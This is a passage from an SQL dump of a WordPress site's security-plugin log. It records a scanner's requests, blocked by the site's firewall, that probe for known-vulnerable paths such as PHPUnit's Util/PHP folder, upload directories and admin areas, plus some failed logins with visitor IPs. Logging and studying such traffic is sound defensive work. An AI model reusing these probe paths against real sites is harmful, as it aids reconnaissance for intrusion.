User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1B1YmxpYy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134574,1700146934.556351,1700146934.547500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/assets/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy9pbWFnZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134610,1700147200.131938,1700147200.121900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/admin/controller/extension/extension/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134575,1700146932.681327,1700146932.668300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/upload/image/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC9pbWFnZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134576,1700146930.971647,1700146930.948700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/vendor/phpunit/phpunit/src/Util/PHP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134655,0.000000,1700167597.446135,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134656,1700167603.084035,1700167603.068700,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134609,1700147202.088172,1700147202.078900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/modules/mod_simplefileuploadv1.3/elements/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMvbW9kX3NpbXBsZWZpbGV1cGxvYWR2MS4zL2VsZW1lbnRzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134577,0.000000,1700146994.235086,0x00000000000000000000FFFFC221BF87,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134578,1700147042.277250,1700147042.268400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Exception/HTTP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0V4Y2VwdGlvbi9IVFRQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134579,1700147039.751498,1700147039.742700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Utility/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1V0aWxpdHkv\",\"category\":\"brute-force\",\"ssl\":1}'),(134608,1700147203.961519,1700147203.950200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/components/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbXBvbmVudHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134580,1700147036.712238,1700147036.703500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Transport/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1RyYW5zcG9ydC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134581,1700147034.743969,1700147034.735100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Response/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1Jlc3BvbnNlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134657,1700167786.946431,1700167786.913700,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4v\",\"category\":\"brute-force\",\"ssl\":1}'),(134607,1700147205.531114,1700147205.516500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/admin/uploads/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMvaW1hZ2VzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134582,1700147032.691365,1700147032.682600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Proxy/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1Byb3h5Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134583,1700147030.821205,1700147030.812200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Cookie/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0Nvb2tpZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134606,1700147220.465651,1700147220.443600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/meta/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(134584,1700147020.559068,1700147020.550300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Content/Type/Sniffer.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Db250ZW50L1R5cGUvU25pZmZlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134585,1700147017.132059,1700147017.122700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Redis.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9SZWRpcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134658,1700167694.395439,1700167694.386600,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/assets/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy9pbWFnZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134605,1700147222.296375,1700147222.286900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(134586,1700147015.591756,1700147015.583100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/MySQL.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9NeVNRTC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134587,1700147013.820966,1700147013.812200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Memcached.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9NZW1jYWNoZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134604,1700147224.034837,1700147224.025300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(134588,1700147012.059945,1700147012.050200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Memcache.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9NZW1jYWNoZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134589,1700147010.531373,1700147010.522700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/DB.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9DYWNoZS9EQi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134603,1700147225.725907,1700147225.711200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134590,1700147008.976313,1700147008.966800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Cache/Base.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 